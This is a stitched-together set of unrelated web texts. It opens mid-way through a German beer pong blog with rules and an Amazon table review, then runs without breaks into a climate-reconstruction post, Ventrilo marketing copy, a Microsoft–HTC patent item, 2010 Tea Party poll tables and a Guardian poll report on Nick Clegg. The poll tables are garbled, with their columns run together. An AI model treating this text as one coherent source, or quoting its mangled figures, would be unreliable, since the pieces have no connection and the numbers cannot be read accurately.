Wird ein Becher getroffen , so muss der Gegner diesen Becher trinken .
Wird mit zwei Bällen pro Wurf gespielt und zwei Becher gleichzeitig getroffen , sind diese auch leer zu trinken .
Erfolgt ein Doppeltreffer , also eine werden zwei Bälle in einen Becher geworfen , muss der Gegner drei Becher trinken .
Wird kein Becher getroffen , so erhält der Gegner die Bälle oder den Ball und darf selbst werfen .
Phase 4 : Der Gewinner
Welches Team zuerst alle gegnerischen Becher auf dem Bier Pong Tisch getroffen hat , ist der Sieger .
Der Verlierer muss nach Siegerehrung alle noch vollen Becher auf dem Bier Pong Tisch leeren .
” Nicht lang schnacken , Kopp in Nacken , Prost ” .
Es darf dann natürlich mit den anderen Partygästen angestoßen werden .
Wo kann man Bier Pong spielen ?
Bier Pong ist das beste Spiel für jede Hausparty oder WG - Party .
Es macht nicht nur Stimmung sondern , es lässt uns auch daraus einen Wettbewerb unter Freunden machen .
Der Gewinner kann sich Ehre und Respekt verschaffen , der Verlierer verliert nicht ganz , denn er darf trinken und die Zuschauer haben Spaß beim Zugucken .
In unserer Heimatstadt Münster wird jedes Jahr z.B. eine Beer Pong WM veranstaltet .
Wir nehmen dort regelmäßig mit unserer WG dran teil und haben einen Spaß der Extraklasse .
Desweiteren gibt es sogar eine Beer Pong Liga .
Die im Laufe der Saison in Bars , Kneipen , Clubs oder Open Air Events veranstaltet wird .
Beer Pong kann man überall spielen , sei es im Sommer draußen oder in seinen 4 Wänden bei der nächsten WG Einweihungsparty .
Besonders für draußen ist ein Bier Pong Tisch von Vorteil .
Denn man hat ein festes Spielfeld parat und es ist für andere ein Blick fang .
Bei uns war es z.B. so das wir unseren Bier Pong Tisch mit an den Dortmund Ems Kanal genommen haben , wo wir die meiste Zeit im Sommer verbracht haben .
Dort waren für andere Leute ein Highlight .
Mit der Zeit haben wir uns daraus einen Spaß gemacht und ein spontanes Turnier ins Leben gerufen .
Via Facebook und co. verbreitete es sich schnell .
So haben wir mit unserem Bier Pong Tisch ein Event am Kanal geschaffen .
Beer Pong findet aber auch immer mehr Popularität in den deutschen Gärten .
Besonders auf Grillpartys , Nachbarschaftsfeiern oder anderen Feierlichkeiten im Garten , ist Beerpong eine Unterhaltung für die Gäste .
Wer Beer Pong in seinem heimischen Garten spielt , hat natürlich das Glück , dass er das Bier stets schön kalt halten kann .
Dafür gibt es neben dem klassischen Kühlschrank inzwischen auch einige coole Möglichkeiten , das Bier direkt im eigenen Garten zu kühlen .
Wie sieht ein professioneller Bier Pong Tisch aus ?
Als wir nach unserer WG - Einweihungparty Bilanz zogen und gutes Feedback der Partygäste erhielten , sowie dass das spontane Bier Pong Turnier sehr gut ankam , sind wir auf die Idee gekommen unseren Holztisch gegen einen professionellen Beer Pong Tisch auszutauschen .
Drum schauten wir uns im Internet mal alle Tische an die es so aktuell im Angebot gibt .
Wir haben uns das Beer Pong Tisch Set von Amazon zugelegt .
Somit hatten wir für einen günstigen Preis , einen qualitativ guten Beer Pong Tisch inklusive 6 Bälle und auch 50 Becher .
Was für die nächste Party definitiv reicht .
Unser Bier Pong Tisch
Unser Bier Pong
Tisch sieht nicht nur stylisch aus , sondern bietet alles was wir zum Bier Pong spielen benötigen .
Der Tisch besteht aus Aluminium und hat somit ein Gewicht von 11 kg.
Zudem ist der Tisch einklappbar und leicht zu transportieren .
Wir verstauen ihn einfach vor dem nächsten Bier Pong Turnier im Abstellraum in der Küche .
Er ist eingeklappt sehr platzsparend .
Zusammengeklappt hat er eine Maße von 61x61x15 cm .
Ausgeklappt ist er viel größer und besitzt eine Maße von 244 x 61 x 76 cm. Die Spielplatte besteht aus MDF mit einer wasserabweisenden Melaminbeschichtung .
Wenn es mal feucht wird , ist es somit leicht abwischbar .
Eine Montage ist nicht nötig .
Der Bier Pong
Tisch braucht nur aufgeklappt zu werden .
Das Highlight des Bier Pong Tisches ist definitiv das Design .
Es wirkt sehr jung und spricht damit besonders die jungen Partywütigen an .
Zudem sind die Markierungen für beide Teams schon vorhanden .
Es heisst dann nur noch Becher aufstellen , befüllen und los gehts .
Als Bonus erhält man sogar 50 Becher und 6 Bälle hinzu .
Für uns dies ein tolles Partypaket .
Wir können zu dem auch sagen , wer einen Bier Pong Tisch für viele Partys oder Veranstaltungen sucht , macht mit diesem Tisch nichts falsch .
Bier Pong Tisch auf Amazon.de ansehen
weitere Bier Pong Tische auf Amazon
Vorteile eines Bier Pong Tisches
Ersteinmal möchte man auf einer Party ein guter Gastgeber sein und seinen Gästen etwas bieten können .
Neben den Snacks , der guten Musik und auch einem gefüllten Kühlschrank , sind Trinkspiele immer ein super Highlight .
Wir kennen es von unseren WG Partys her , dass wir oft Looping Louie gespielt haben .
Das macht absolut Fun .
Allerdings konnten es immer nur 4 Spieler maximal spielen .
Sollte wer Looping Louie nicht kennen , geben wir euch gerne eine Kurzfassung .
Bei Looping
Louie geht es darum , dass das Flugzeug was umherkreist deine Chips nicht abschießt oder fliegt .
Wenn alle deine drei Chips weg sind , hast du verloren und musst einen Kurzen trinken .
Looping Louie ist ein Spiel bei dem deine Reflexe gefordert werden .
Solltest du allerdings häufiger Runden verlieren , wird es immer schwerer mit den Reflexen .
Das Spiel macht einen heiden Spaß , allerdings wie oben schon genannt , ist es für 4 Leute ausgelegt .
Während 4 Personen in der Küche sich an Looping Louie begnügten , kamen einige unserer Gäste auf die Idee Bier Pong zu spielen .
So wurde unsere gemietete Bierzeltgarnitur einfach mal fix zu einem Bier Pong Tisch umfunktioniert .
Allerdings müssen wir sagen , für uns reichte der Tisch nicht .
Er war zu tief und war nicht unser Eigentum .
Ein paar
Tage später , kam Kai auf die Idee seinen Bachelor zu feiern und wir haben kurzerhand gesagt , dass ein richtiger Bier Pong Tisch her muss .
Die 5 Vorteile eines Bier Pong Tisches
Für uns hat ein Bier Pong Tisch nur Vorteile .
5 dieser Vorteiler nennen wir euch .
Vorteil 1 : Die Optik eines Bier Pong Tisches .
Diese wirkt professionell und zeigt unseren Gästen das wir uns Mühe zur Unterhalung bieten
Die Optik eines Bier Pong Tisches .
Diese wirkt professionell und zeigt unseren Gästen das wir uns Mühe zur Unterhalung bieten Vorteil 2 : Ein Bier Pong
Tisch ist leicht sauber zu halten .
Ein Lappen und ein wenig Wasser und der Tisch ist wieder sauber .
Ein Bier Pong
Tisch ist leicht sauber zu halten .
Ein Lappen und ein wenig Wasser und der Tisch ist wieder sauber .
Vorteil 3 : Sportliche Aktivität , nichts ist geiler als ein Wettbewerb unter Freunden der nicht nur Spaß macht sondern selbst auch Zuschauer unterhält .
Sportliche Aktivität , nichts ist geiler als ein Wettbewerb unter Freunden der nicht nur Spaß macht sondern selbst auch Zuschauer unterhält .
Vorteil 4 : Die guten Tische , sei es ein Esstisch oder Wohnzimmertisch bleiben verschont .
Die guten Tische , sei es ein Esstisch oder Wohnzimmertisch bleiben verschont .
Vorteil 5 : Ein Bier Pong
Tisch kann jederzeit eingeklappt werden und überall verstaut werden .
Er ist leicht und sehr einfach zu transportieren .
So sind wir im Internet auf die Suche gegangen und auch bei Amazon fündig geworden .
Fazit zum Bier Pong Tisch
Ein Bier Pong
Tisch ist für jede Party ein absoulter Vorteil .
Ihr als Gastgeber bietet euren Gäsen ein lustige uns spaßige Beschäftigtung .
Die Stimmung kann dadurch angeheitzt werden und ihr habt asoluten Spaß .
Ein weiterer Punkt ist , das Spiel , sowie der Bier Pong Tisch kann an jedem Ort eurer Wahl gespielt werden .
Ihr könnt den Bier Pong Tisch einfach mit zum Kanal , auf die Wiese oder zum Kumpel in die Wohnung ohne große Mühen transportieren .
Für uns ist der Bier Pong Tisch immer ein Aufbau wert , denn wir lieben dieses Spiel .
Wir wünschen euch somit viel Spaß mit dem Bier Pong Tisch und PROST !
– Euer Tim , Kai und Lars .
Was euch auch zum Thema Bier Pong Tisch interessieren könnte :
Beer Pong Becher
Beer Pong Luftmatratze
Beer Pong Matte
TOP 1 - Beer Pong Tisch Set - Audio Table Design 10 Design 10.0/10
Hingucker 10.0/10
Zubehör 10.0/10
Preis 9.8/10
Spaßfaktor 10.0/10
Vorteile cooles Design
wasserabweisend
leicht zu transportieren
ein Highlight auf jeder Party
hoher Spaßfaktor Nachteile keine Unseren Bier Pong Tisch auf Amazon kaufen *
From CO2 Science , another peer reviewed paper with a paleoclimatology reconstruction based on cores containing plankton shells , show that both the Medieval Warm Period ( MWP ) and the Little Ice Age ( LIA ) can be seen in Indonesia .
In the past , critics have said these events to be “ regional ” implying they occurred only around Europe , due to lack of historical records in other regions of the world .
Since the Oxygen18 isotope dating method seems well proven , it would seem this study has a good basis for its claims .
Even RC ’s Gavin Schmidt likes it .
Co2 Science writes :
From the authors ’ Figure 2b , adapted below , we calculate that the Medieval Warm Period was about 0.4 °C warmer than the Current Warm Period .
The Makassar Strait ( Wikipedia )
Foraminifera samples .
Description
Oppo et al. derived a continuous sea surface temperature ( SST ) reconstruction from the Indo - Pacific Warm Pool ( IPWP ) , which they describe as “ the largest reservoir of warm surface water on the earth and the main source of heat for the global atmosphere . ”
This history — which was based on δ 18O and Mg / Ca data obtained from samples of the planktonic foraminifera Globigerinoides ruber found in two gravity cores , a nearby multi-core ( all at 3°53 ’S , 119°27 ’E ) , and a piston core ( at 5°12 ’S , 117°29 ’E ) that were recovered from the Makassar Strait on the Sulawesi margin — spans the past two millennia and , as they describe it , “ overlaps the instrumental record , enabling both a direct comparison of proxy data to the instrumental record and an evaluation of past changes in the context of twentieth century trends . ”
Reconstructed SSTs were , in their words , “ warmest from AD 1000 to AD 1250 and during short periods of first millennium . ”
Reference
Oppo , D.W. , Rosenthal , Y. and Linsley , B.K. 2009 .
2,000 - year - long temperature and hydrology reconstructions from the Indo - Pacific warm pool .
Nature 460 : 1113-1116 .
Share this : Print
Email
Twitter
Facebook
Pinterest
LinkedIn
Reddit
Like this : Like Loading ...
Hidden Object Games !
That 's why I review and write about them in my secret identity as The Hidden Object Guru !
Find out more about all that by following this link
Or this next link , to a YouTube channel of all my videos !
Ventrilo 4.0 is the next evolutionary step of Voice over IP ( VoIP ) group communications software .
Ventrilo is also the industry standard by which all others attempt to emulate .
By offering surround sound positioning and special sound effects on a per user , per channel , per server or global configuration level , the program provides each User the option to fully customize sounds from other Users or events .
Ventrilo is best known for its superior sound quality and minimal use of CPU resources so as not to interfere with normal operations of the computer or during online game competitions .
It is also preferred for the simple User interface that any first time computer User can very quickly learn because the most commonly used features are immediately visible and can be activated with a single click of the mouse .
Ventrilo uses a client - server based connection that is always encrypted .
User data is never collected or stored , hence it can not be shared / sold to external entities .
All text - chat communications / audio - recordings are stored locally on the Client computer .
Ventrilo Servers are hosted in secure data - centers located world - wide .
The use of data - centers provides for security , power backup , sufficient internet bandwidth , and maximum uptime .
To see what the program looks like and a list of some of the many features the program offers please click on the About link in the navigation menu .
To see what 's new in version 4.0 click here .
QuoteCounterquote.com
WeaselsRipped.com
WalterKaylin.com
Preview of our anthology of men's adventure magazines stories by the great Walter Kaylin
MensCrypto.com
Preview of our CRYPTOZOOLOGY ANTHOLOGY , the first ever colleciton of Preview of our anthology of men's adventure magazines stories by the great Walter Kaylin
The famous quotes linked to each day of the yearOrigins , witty uses and abuses of famous quotations Preview of ourmen 's adventure magazines story anthology
Over the past year , the relationship between Microsoft and HTC seems to have cooled off a bit .
HTC seems to be focused more on Android , but late last night , Microsoft and HTC announced a new agreement between the two companies .
Microsoft and HTC have signed an agreement which gives HTC access to Microsoft ’s patent portfolio , but it may not be what you are expecting .
The agreement covers HTC handsets which run on Google ’s Android OS and have nothing to do with Windows Mobile or Windows Phone 7 .
“ HTC and Microsoft have a long history of technical and commercial collaboration , and today ’s agreement is an example of how industry leaders can reach commercial arrangements that address intellectual property .
We are pleased to continue our collaboration with HTC . ”
Microsoft has been licensing out its patents and IP for the past seven years and has made it a point to collaborate with other companies that may be infringing on their proprietary technology .
Microsoft has a long history of patent claims over Linux and has a few licensing agreements already in place for the OS .
We ’re not entirely sure what claims Microsoft thinks they have on Android , but it ’s good to see a licensing agreement between them and HTC rather than a lawsuit .
I find it a little humorous that HTC is paying Microsoft to use Google ’s FREE Android OS .
Source : Microsoft via Engadget
On the Tea Party There is widespread belief among Tea Party supporters that their movement generally reflects the views of most Americans .
Half said the Tea Party is active in their communities but few attend a meeting or rally themselves .
Most supporters see at least some difference between their movement and the Republican party .
Tea
Party All
respon -
dents Difference
Do the views of the people involved in the Tea Party movement generally reflect the views of most Americans ?
Reflect most Americans 84 % 25 % +59
Do not reflect most Americans 8 36 – 28 Both / Some 3 2 +1
Do n’t know or no answer 4 38 – 34 How much difference is there between the Republican Party and the Tea Party movement ?
A lot 19 % 11 % +8 Some 61 29 +32 Not much 13 18 – 5 None at all 4 8 – 4 Do n’t know or no answer 3 34 – 31 Is the Tea Party movement politically active in your community ?
Yes 50 % 21 % +29 No 40 51 – 11
Do n’t know or no answer 10 28 – 18 Tea
Party All
respon -
dents Difference
What should be the goal of the Tea Party movement ?
Reduce federal government 45 % — — Cutting budget 6 — — Lowering taxes 6 — — Electing their own candidates 7 — — Creating jobs 9 — — Something else 7 — — All of them 18 — —
Do n’t know or no answer 3 — —
Have you supported the Tea Party movement by ...
Donated money 2 % — —
Attended rally or meeting 13 — — Both 5 — — Neither 78 — —
Do n’t know or no answer 2 — —
Where do you get most of your information about the Tea Party movement ?
Internet 24 % — — E-mail 4 — — Meetings 1 — — Phone calls 1 — — Television
47 — — Newspapers 8 — — Other source
11 — —
Do n’t know or no answer 3 — — Tea
Party All
respon -
dents Difference
Are you more likely to trust information from ...
Other supporters
45 % — — Television or newspapers
37 — — Both 5 — — Neither 7 — — Do n’t know or no answer 6 — —
President Obama and Congress
There is striking agreement among supporters of the Tea Party in their negative views toward President Obama and Congress .
Mr. Obama is doing a dismal job as president , he expanded the role of government too much , and his policies are moving the country toward socialism , according to the Tea Party supporters , and most members of Congress do not deserve re-election .
Tea
Party All
respon -
dents Difference
Do you approve of the way Barack Obama is handling his job ?
Approve 7 % 50 % – 43 Disapprove 88 40 +48
Do n’t know or no answer 5 10 – 5 Do you approve of the way Barack Obama is handling the economy ?
Approve 6 % 43 % – 37 Disapprove 91 46 +45
Do n’t know or no answer 3 11 –8 Do you approve of the way Barack Obama is handling health care ?
Approve 6 % 41 % – 35 Disapprove 93 51 +42
Do n’t know or no answer 2 9 – 7 Tea
Party All
respon -
dents Difference
Do you approve of the way Barack Obama is handling the federal budget deficit ?
Approve 5 % 29 % – 24 Disapprove 91 53 +38
Do n’t know or no answer 4 18 – 14 What is your opinion of Barack Obama ?
Favorable 7 % 43 % – 36 Not favorable 84 33 +51 Undecided 7 17 – 10
Have n’t heard enough 2 7 –5 Refused 0 1 –1
In trying to solve the economic problems facing the country , do you think Barack Obama has expanded the role of government too much ?
Too much 89 % 37 % +52 Not enough 3 18 – 15 About right 6 36 – 30 Do n’t know or no answer 2 9 – 7 Tea
Party All
respon -
dents Difference Do Barack Obama ’s policies are moving the country more toward socialism ?
Toward socialism 92 % 52 % +40 Not toward socialism 6 38 – 32
Do n’t know or no answer 2 10 –8 Is Barack Obama a liberal , a moderate , or a conservative ?
Very liberal 77 % 31 % +46 Somewhat liberal 9 18 –9 Moderate 7 28 – 21 Somewhat conservative 0 6 –6 Very conservative 1 4 –3 Do n’t know or no answer 5 13 – 8 Do you think Barack Obama was born in the United States ?
Born in U.S. 41 % 58 % – 17 Another country 30 20 +10
Do n’t know or no answer 29 23 +6 Tea
Party All
respon -
dents Difference
Do the policies of the Obama Administration favor the rich , favor the middle class , favor the poor , or do they treat all groups equally ?
Favor the rich 16 % 17 % – 1 Favor the middle class 6 19 – 13 Favor the poor 56 27 +29 Treat all equally 9 27 – 18 Do n’t know or no answer 13 9 +4
Do you approve of the way Congress is handling its job ?
Approve 1 % 17 % – 16 Disapprove 96 73 +23
Do n’t know or no answer 3 10 – 7
Do you approve of the way your Congressional representative is handling his or her job ?
Approve 40 % 46 % – 6 Disapprove 49 36 +13
Do n’t know or no answer 10 18 – 8 Tea
Party All
respon -
dents Difference
In general , is your opinion of the Republican Party favorable ?
Favorable 54 % 38 % +16 Not favorable 43 53 – 10
Do n’t know or no answer 4 9 –5 In general , is your opinion of the Democratic Party favorable ?
Favorable 6 % 42 % – 36 Not favorable 92 50 + 42
Do n’t know or no answer 2 8 –6 Some people say the country needs a third political party — a new party to compete with the Democratic and Republican parties .
Do you agree or disagree ?
Agree 40 % 46 % – 6 Disagree 52 48 +4
Do n’t know or no answer 8 6 +2
The Economy and the Deficit Backers of the Tea Party movement view the national economy much more negatively than does the general public .
Most say the government ’s stimulus package has had no impact on the economy and the bank bailout was unnecessary .
They are less likely compared with other Americans to regard their income tax bill as fair .
Most supporters did not want the government to spend money to create jobs if that will increase the deficit .
But they are divided over whether they would prefer a reduction in the deficit or a tax cut .
Tea
Party All
respon -
dents Difference
How would you rate the condition of the economy these days ?
Very good 0 % 1 % – 1 Fairly good 6 22 – 16 Fairly bad 39 43 – 4 Very bad 54 34 +20
Do n’t know or no answer 1 1 0 Do you think the economy is getting better , getting worse , or staying about the same ?
Better 14 % 33 % – 19 Worse 42 23 +19 Same 42 43 – 1
Do n’t know or no answer 1 1 0 Who do you think is mostly to blame for the current state of the nation ’s economy ?
Bush administration 5 % 32 % – 27 Obama administration 10 4 +6 Wall Street and financial institutions 15 22 – 7 Congress 28 10 +18 Someone else 6 7 –1 All of the above 15 9 +6 Combination 20 13 +7
Do n’t know or no answer 1 2 – 1 Tea
Party All
respon -
dents Difference
So far , do you think the government ’s stimulus package has made the economy better , worse , or has it had no impact so far ?
Better 10 % 32 % – 22 Worse 36 18 +18 No impact 52 44 +8
Do n’t know or no answer 2 6 – 4
Do you think providing government money to banks and other financial institutions was necessary to get the economy out of recession ?
Necessary 17 % 39 % – 22 Economy will improve without it 74 51 +23
Do n’t know or no answer 9 10 – 1
Do you regard the income tax which you will have to pay this year as fair ?
Yes , fair 52 % 62 % – 10 No , not fair 42 30 +12 Do n’t know or no answer 5 8 – 3 Tea
Party All
respon -
dents Difference
Who do you think is mostly to blame for most of the current federal budget deficit ?
Bush administration 6 % 39 % – 33 Obama administration 24 8 +16 Congress 37 19 +18 Someone else 5 13 –8 All of the above 10 8 +2 Combination 16 9 +7
Do n’t know or no answer 1 3 – 2 Should the government spend money to create jobs , even if it increases the budget deficit , or should it focus instead on reducing the budget deficit ?
Create jobs 17 % 50 % – 33 Reduce budget deficit 76 42 +34
Do n’t know or no answer 7 7 0 If you had to choose , would you prefer reducing the federal budget deficit or cutting taxes ?
Reducing deficit 42 % 45 % – 3 Cutting taxes 49 47 +2
Do n’t know or no answer 9 8 +1
Government
The public ’s trust in government is near historic lows , and Tea Party supporters are even more intense in their distaste for the government .
A majority of those affiliated with the Tea Party are angry with the way things are going in Washington .
Most would prefer smaller government even if domestic spending would be cut .
Tea
Party All
respon -
dents Difference
How much of the time do you think you can trust the government in Washington to do what is right ?
Always 0 % 4 % – 4 Most 6 16 – 10 Some 75 70 +5 Never 19 8 +11 Do n’t know or no answer 0 2 – 2 Which comes closest to your feelings about the way things are going in Washington ?
Enthusiastic 1 % 5 % – 4 Satisfied but not enthusiastic 4 26 – 22 Dissatisfied but not angry 41 48 – 7 Angry 53 19 +34
Do n’t know or no answer 0 2 – 2 If you had to choose , would you rather have a smaller government providing fewer services , or a bigger government providing more services ?
Smaller government , fewer services 92 % 50 % +42 Bigger government , more services 4 37 – 33 Depends 2 5 –3
Do n’t know or no answer 2 8 – 6 Tea
Party All
respon -
dents Difference
Are you , or is any member of your family , receiving Social Security benefits ?
Yes , self 17 % 12 % +5 Yes , other 13 12 +1 Yes , self and other 18 8 +10 No 51 67 – 16 Do n’t know or no answer 0 1 – 1 Are you , or is any member of your family , covered by Medicare ?
Yes , self 16 % 13 % +3 Yes , other 12 12 0 Yes , self and other 16 9 +7 No 56 66 – 10 Do n’t know or no answer 1 1 0 Are the benefits from government programs such as Social Security and Medicare worth the costs of those programs ?
Worth it 62 % 76 % – 14 Not worth it 33 19 +14
Do n’t know or no answer 6 5 +1 Tea
Party All
respon -
dents Difference
How much have you heard or read about the Federal Reserve ?
A lot 25 % 17 % +8 Some 45 33 +12 Not much 25 37 – 12 Nothing 5 12 – 7
Do n’t know or no answer 1 0 +1 How much confidence do you have in the Federal Reserve ’s ability to promote financial stability ?
A lot 5 % 8 % – 3 Some 38 31 +7 Not much 28 19 +9 None 9 6 +3 Do n’t know enough 20 33 – 13
Do n’t know or no answer 1 2 –1
Political Figures Most Tea Party supporters have a favorable opinion of Sarah Palin , but less than half say she would be an effective president .
Most have a favorable opinion of Former President George W. Bush and Glenn Beck .
but about a third hold a favorable opinion of 2008 Republican presidential candidate John McCain .
Tea
Party All
respon -
dents Difference
Is your opinion of the Tea Party movement favorable ?
Favorable 85 % 21 % +64 Not favorable 1 18 – 17 Undecided 9 14 –5 Have n’t heard enough 4 46 – 42 Refused 0 2 – 2 Would Sarah Palin have the ability to be an effective President ?
Yes 40 % 26 % +14 No 47 63 – 16
Do n’t know or no answer 13 11 +2 Is your opinion of George W. Bush favorable ?
Favorable 57 % 27 % +30 Not favorable 27 58 – 31 Undecided 14 14 0 Have n’t heard enough 1 1 0 Refused 1 1 0 Tea
Party All
respon -
dents Difference
Is your opinion of John McCain favorable ?
Favorable 35 % 23 % +12 Not favorable 37 36 +1 Undecided 24 27 –3
Have n’t heard enough 3 12 –9 Refused 0 2 – 2 Is your opinion of Glenn Beck favorable ?
Favorable 59 % 18 % +41 Not favorable 6 17 – 11 Undecided 17 17 0 Have n’t heard enough 17 47 – 30 Refused 0 1 –1
Have you purchased gold coins or bars in the last twelve months ?
Yes 5 % — — No 93 — —
Do n’t know or no answer 3 — —
Racial Attitudes
Most supporters of the Tea Party movement say black and white people have an equal chance of getting ahead in today ’s society .
Tea Party supporters are significantly more likely than all adults to say that too much has been made of the problems of black people .
Tea
Party All
respon -
dents Difference
In general , who do you think has a better chance of getting ahead in today ’s society ?
White people 16 % 31 % – 15 Black people 7 4 +3 Equal 73 60 +13
Do n’t know or no answer 4 5 –1 In recent years , has too much been made of the problems facing black people ?
Too much 52 % 28 % + 24 Too little 6 16 – 10 Just right 36 44 –8 Do n’t know or no answer 6 11 –5 Do the policies of the Obama administration favor whites over blacks , favor blacks over whites , or do they treat both groups the same ?
Favor whites over blacks 1 % 2 % – 1 Favor blacks over whites 25 11 +14 Treat both the same 65 83 – 18 Do n’t know or no answer 9 5 +4
Social Issues Tea Party backers are more concerned with economic issues than social issues .
They are divided over the issue of legal immigration , while calling illegal immigration a serious problem .
Tea Party supporters are divided over the issue of same - sex marriage .
Most say the Roe v.
Wade decision was a bad thing .
Most Tea Partiers say either global warming will never have a serious impact on the environment or it does n’t exist .
Tea
Party All
respon -
dents Difference
When thinking about important issues facing the country which concerns you more right now ?
Economic issues 78 % 80 % – 2 Social issues 14 13 +1 Both 7 4 +3 Do n’t know or no answer 0 2 – 2 Should legal immigration be kept at its present level ?
Present level 39 % 35 % +4 Increased 14 16 – 2 Decreased 42 41 +1
Do n’t know or no answer 5 7 – 2 How serious a problem do you think the issue of illegal immigration is for the country right now ?
Very serious 82 % 60 % + 22 Somewhat serious 15 23 – 8 Not too serious 2 12 – 10 Not at all serious 1 3 – 2 Do n’t know or no answer 1 2 – 1 Tea
Party All
respon -
dents Difference
Gay couples should be allowed to ...
Allowed to legally marry 16 % 39 % – 23 Civil unions 41 24 +17
No legal recognition 40 30 +10
Do n’t know or no answer 3 7 – 4 Abortion should be ...
Generally available 20 % 36 % – 16 Available but limits 45 38 +7 Should not be permitted 32 23 +9
Do n’t know or no answer 2 3 – 1 Do you think the Supreme Court ’s decision in Roe v. Wade was a good thing ?
Good thing 40 % 58 % – 18 Bad thing 53 34 +19 Both good / bad 3 3 0 Do n’t know or no answer 4 5 –1
Health Insurance Tea Party supporters are firmly against the recent health care legislation .
Most say the government should not require all Americans to have health insurance , and do not think upper - income Americans should be taxed to pay for the uninsured .
Most Tea Partiers do agree that health insurance companies should be required to cover anyone regardless of pre-existing conditions .
Tea
Party All
respon -
dents Difference
As long as the federal government provides financial help to those who cannot afford health insurance , should the federal government require nearly all Americans to have health insurance ?
Should 12 % 49 % – 37 Should not 85 45 +40
Do n’t know or no answer 3 7 –4 Do you think it is a good idea to raise income taxes on households that make more than $ 250,000 a year to provide health insurance for people who do not have it ?
Good idea 17 % 54 % – 37 Bad idea 80 39 +41
Do n’t know or no answer 3 7 –4
Do you approve of requiring health insurance companies to cover anyone who applies for health insurance regardless of whether or not they have an existing medical condition or a prior illness ?
Approve 59 % 81 % – 22 Disapprove 32 15 +17
Do n’t know or no answer 9 4 +5
Guns A majority of Tea Party supporters think gun control laws should be kept as they are now .
They are are more likely than Republicans nationwide to say gun control laws should be less strict .
Tea
Party All
respon -
dents Difference
Do you or anyone in your household own a gun ?
Respondent does 31 % 21 % +10 Someone in household does 12 13 – 1 Both do 15 7 +8
No gun in household 32 56 – 24 Gun control laws should be ...
More strict 13 % 40 % – 27 Less strict 30 16 +14 Kept as they are now 55 42 +13
Do n’t know or no answer 2 3 –1
Nick Clegg has surged into contention as a potential prime minister , according to a Guardian / ICM poll carried out following last night 's TV leaders ' debate .
A quarter of voters who watched the three leaders on the ITV programme say they will switch their vote , with most changing to the Liberal Democrats .
Clegg emerges from the telephone poll as the overwhelming winner , with 51 % who watched saying he came out on top .
David Cameron and Gordon Brown trail in far behind : 20 % say Cameron won and 19 % Brown .
The poll , based on a sample of 505 voters who had previously told ICM how they would vote , found Conservative and Labour supporters also thought Clegg won the event .
While 44 % of Tories thought Cameron won , 46 % thought Clegg did .
Among Labour voters , 43 % said Brown won , and 44 % Clegg .
The Guardian poll coincides with a survey of voting intentions carried out by ComRes for ITV .
It showed support for the Conservatives was unchanged at 35 % , with Labour down one point on 28 % , and the Lib Dems up three on 24 % .
Among those voters who had watched the debate , the surge in Lib Dem support was more dramatic : up 14 points to 35 % , only a shade behind the Conservatives on 36 % , who were down three .
Labour languished in third place , at 24 % , also down three .
Clegg was in high spirits today as he addressed activists at Warrington Wolves 's rugby stadium to seize on the momentum generated by his TV performance .
" We are now the party of fairness in British politics , " he said .
" Last night 's debate was an important moment in this campaign because it gave us the opportunity to say to people directly sitting in their living rooms , sitting at home , that the real choice is between the old parties and the new , different , fair politics offered by the Liberal Democrats . "
According to the ICM poll for the Guardian , Clegg appears to have won the affections of voters across the board .
He now runs Brown neck and neck as the man voters think would make the best prime minister , 29 % to 29 % .
Cameron remains just ahead on 33 % .
Clegg is also far ahead as the leader who offers substance over spin .
Cameron comes off worst among people who saw the debate , with 47 % saying he is more spin than substance against 36 % who say that of Brown and 11 % Clegg .
Cameron performed particularly badly with Lib Dem supporters , with 61 % saying he offered spin over substance .
That suggests the Tory leader 's appeal to centre ground voters is faltering .
The debate had a clear impact on people 's voting intentions , although the effect may fade as polling day approaches .
Among people who saw the debate , 23 % say they will change their mind , including 25 % of Conservatives and 21 % of Labour voters .
Most of them are going to the Lib Dems , with 54 % of people changing their minds saying they will move to the party .
A further 17 % say they will switch to Labour .
The Conservatives have attracted the least new support with only 13 % saying they plan to move their vote to the party .
The Liberal Democrats were today hailing the leader 's performance as a potential " game - changer " as a battery of early polls gave Clegg the thumbs up .
A Times Populus poll conducted last night indicated that 61 % of voters believed Clegg had won the night , compared with 22 % for Cameron and 17 % for Brown .
Research by YouGov for the Tory - supporting Sun in the immediate aftermath of the programme put Clegg on an impressive 51 % , Cameron on 29 % and Brown on 19 % .
A text message poll for Sky News by Fizzback also rated Clegg highest , with 37 % of the 1,608 voters polled .
Brown came second with 32 % of the votes and Cameron lagged behind with 31 % .
Cameron , who had expressed fears ahead of the debate that it might be " sluggish and slow " , told a phone - in on BBC Radio Manchester : " I think he [ Clegg ] had a good debate but I must say I just enjoyed being able to talk to people at home , to address the questions that I think are the big questions , things like immigration , the economy and crime .
I thought it was a great opportunity . "
The shadow schools secretary , Michael Gove , warned that the Tories now intended to subject the Lib Dems ' policy programme to intense scrutiny .
He highlighted Lib Dem plans to join the euro , scrap the Trident nuclear deterrent and offer an amnesty to illegal immigrants , which , he said , lay well outside the political mainstream .
" The greater degree of scrutiny these policies have , the more that people will realise that , while Nick Clegg is a very attractive individual in many ways , the policies of his party are outside the mainstream and a little bit eccentric – not necessarily what you would want at a time of crisis and difficulty , " he told Sky News .
The 90 - minute leaders ' debate , broadcast on ITV , was the most watched show last night , attracting an average audience of 9.4m .
Despite the polling , senior Tories said Cameron 's performance showed he was " ready to be prime minister " after scoring " clear wins " on key issues .
Today , the Tory leader sought to seize back the initiative on the campaign trail with an X Factor - style project which he said would help him achieve his aim of building a " big society " .
Flanked by the Take That star Gary Barlow , Cameron announced that a Tory government would introduce a national music talent competition called School Stars , which would involve local and regional heats , and would culminate in a national final in June 2011 .
Winners would get the chance to record a song with Barlow .
Also on the campaign trail , the Labour camp sought to talk up their leader 's performance and were keen to point out that last night was the first act of a three - act drama , in a nod to the other TV debates scheduled over the next two weeks .
The home secretary , Alan Johnson , told Sky News that Brown was not a " song - and - dance man " and conceded that Clegg and Cameron were " more adept " in front of a camera .
" I thought Gordon did very well .
This was kind of politics unplugged ; they all had to do an acoustic session and I thought that worked very well . "
He added : " The event was good for politics , it was good in particular for the election and I think Gordon did very , very well ...
I think Gordon took the prize on substance , Clegg on style .
He outstyled Cameron but it was good for politics in general . "
• ICM Research interviewed a random sample of 505 people by telephone on 15th April 2010 .
It reinterviewed people who had previously been selected at random who told them they would be watching the debate and had agreed to be interviewed again .
The sample has been weighted to the profile of all people selected at random who previously stated they would be watching the debate .
ICM is a member of the British Polling Council and abides by its rules
The app also provides notice of tweets and re-tweets , allows users to search Twitter for keywords , and the layout has been optimised for the smaller screens on BlackBerry devices .
Links are automatically shortened without the need to visit a third - party site .
